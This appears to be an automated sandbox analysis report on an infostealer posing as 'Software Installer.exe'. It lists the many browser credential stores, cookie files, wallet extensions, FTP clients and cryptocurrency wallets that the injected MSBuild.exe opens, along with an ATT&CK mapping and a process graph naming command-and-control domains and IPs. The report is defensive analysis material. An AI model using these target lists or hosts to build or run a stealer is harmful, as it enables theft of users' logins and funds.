Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
MITRE ATT&CK matrix (one line per tactic; a leading number is the count shown in the report for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 13 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 411 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 111 Masquerading; 251 Virtualization/Sandbox Evasion; 411 Process Injection
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 11 File and Directory Discovery; 43 System Information Discovery; 261 Security Software Discovery; 1 Process Discovery; 251 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 41 Data from Local System; 1 Screen Capture; 2 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 3 Ingress Tool Transfer; 21 Encrypted Channel; 11 Non-Standard Port; 4 Non-Application Layer Protocol; 15 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1638808 | Sample: Software Installer.exe | Start date: 14/03/2025 | Architecture: WINDOWS | Score: 100

Start node:
  DNS/IP: trumpsscamer2009.top; ip-api.com; 4 other IPs or domains
  Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 9 other signatures
  Started: Software Installer.exe (14)

Software Installer.exe (14):
  DNS/IP: ip-api.com 208.95.112.1, 49711, 49719, 80, TUT-ASUS, United States; 83.217.208.69, 49714, 49727, 5000, INF-NET-ASRU, Russian Federation; api.ipify.org 104.26.13.205, 49710, 49713, 49717, CLOUDFLARENETUS, United States
  Dropped file: C:\Users\user\Microsoft_Driver_vs_2019.exe, PE32+
  Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Adds a directory exclusion to Windows Defender
  Started: Microsoft_Driver_vs_2019.exe (1); powershell.exe (22); powershell.exe; powershell.exe (14 15)

Microsoft_Driver_vs_2019.exe (1):
  Signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
  Started: MSBuild.exe; conhost.exe

powershell.exe (22):
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe

powershell.exe:
  Started: conhost.exe

powershell.exe (14 15):
  DNS/IP: trumpsscamer2009.top 172.67.159.94, 443, 49709, 49720, CLOUDFLARENETUS, United States
  Started: conhost.exe

MSBuild.exe:
  DNS/IP: citydisco.bet 188.114.97.3, 443, 49725, 49729, CLOUDFLARENETUS, European Union
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); 3 other signatures